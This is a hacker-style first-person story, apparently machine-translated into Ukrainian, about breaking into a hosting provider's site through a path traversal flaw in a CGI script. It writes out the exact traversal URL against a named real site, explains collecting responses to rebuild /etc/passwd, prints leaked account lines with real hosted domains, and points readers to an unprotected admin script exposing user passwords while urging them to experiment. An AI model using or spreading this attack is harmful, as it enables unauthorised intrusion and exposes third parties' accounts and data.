Хто з нас не знає хостинг, надається WWW.AGAVA.RU? ЯК??? Ти не знаєш? Ну а як же твоя сторінка h1.ru? Немає? А даремно! Хоча це питання ще спірний. Ну, так ось. Про все по порядку. Занесло мене одного разу на www.baklanov.net. Сторінка, начебто, нічого, нормальна.
Подивився, покликал по посиланнях.
Коли набридло, став дивитися які скрипти використовуються.
Знайшов один дуже цікавий: www.baklanov.net/cgi-bin/lin.cgi.
Скрипт показує картинки з папки ZIP. Символи… / / він не обрізає.
Відмінне поле для військових дій.
Спочатку вставляю в браузер www.baklanov.net/cgi-bin/lin.cgi?t=../../../../../../../etc/passwd і
отримую відповідь: пагу, на якій крім рекламного банера зверху
є кнопка з написом «ще» і нічого більше.
Клікаю по ній і отримую таку ж відповідь.
Невже мої очікування не виправдалися? Дивлюся відповідь від сервера в блокноті і що я бачу
У місці, де повинна була вставлятися картинка з заданої папки перебувати
один рядок з /etc/passwd. Швиденько пишу програму, яка зберігає
сторінки ні жорсткому диску.
Ставлю її на збереження www.baklanov.net/cgi-bin/lin.cgi?t=../../../../../../../etc/passwd в
кількості 500. Через 20 хвилин вона закінчують роботу.
Отже, маємо 500 файлів у яких є серед купи html тегів по одному рядку з /etc/passwd.
Пишу іншу програму, яка вирізає з отриманих файлів тільки потрібну мені сходинку.
Видаляю повторюють і отримую весь файл etc/passwd. Ось його частину:
root:*:0:0:System Admin:/root:/bin/sh/
stulchi1:*:2015:200:stulchik.net:/home/s/stulchik.net:/usr/local/bin/bash/
spec1:*:1698:32:AGAVA personnel:/var/home/spec1:/usr/local/bin/bash/
hellbell1:*:2003:200:hellbell.h1.ua:/home/h/hellbell.h1.ua:/usr/local/bin/bash/
sexytop5:*:2012:200:sexytop.ero.ua:/home/s/sexytop.ero.ua:/usr/local/bin/bash/
mp3bakl4:*:2011:200:mp3.baklanov.net:/home/m/mp3.baklanov.net:/usr/local/bin/bash/
neznakomka1:*:2017:200:neznakomka.com1.ua:/home/n/neznakomka.com1.ua:/usr/local/bin
coolert4:*:2005:201:baklanov.net:/home/b/baklanov.net:/usr/local/bin/bash/
erobakl4:*:2008:200:badgirls.ua:/home/b/badgirls.ua:/usr/local/bin/bash/
cleb4:*:2009:200:celeb.ua:/home/c/celeb.ua:/usr/local/bin/bash/
dailyga1:*:2010:201:dailygags.com:/home/d/dailygags.com:/usr/local/bin/bash/
ivan:*:1062:32:AGAVA personnel:/var/home/ivan:/usr/local/bin/bash/
cooler1:*:2004:200:cooler.baklanov.net:/home/c/cooler.baklanov.net:/usr/local/bin/bash/
Шкода etc/schadow дістати не зміг. Але це і природно.
Далі більше. Тими ж підручними засобами читаю каталоги,
файли, до яких немає доступу звичайного користувача WEB.
І виявляю цілий список скриптів, до яких немає доступу зі сторінок www.baklanov.net.
Один з них: www.baklanov.net/cgi-bin/cardadm.pl є админовским скриптів,
дозволяє читати, видаляти листівки на сайті.
Причому видно все ID користувачів і їхні паролі.
Доступ до нього відкритий для всіх бажаючих.
Можеш спробувати поекспериментувати ще з даними скриптами,
але тільки не забувай заповідь хакера: не убий сервер ворога свого.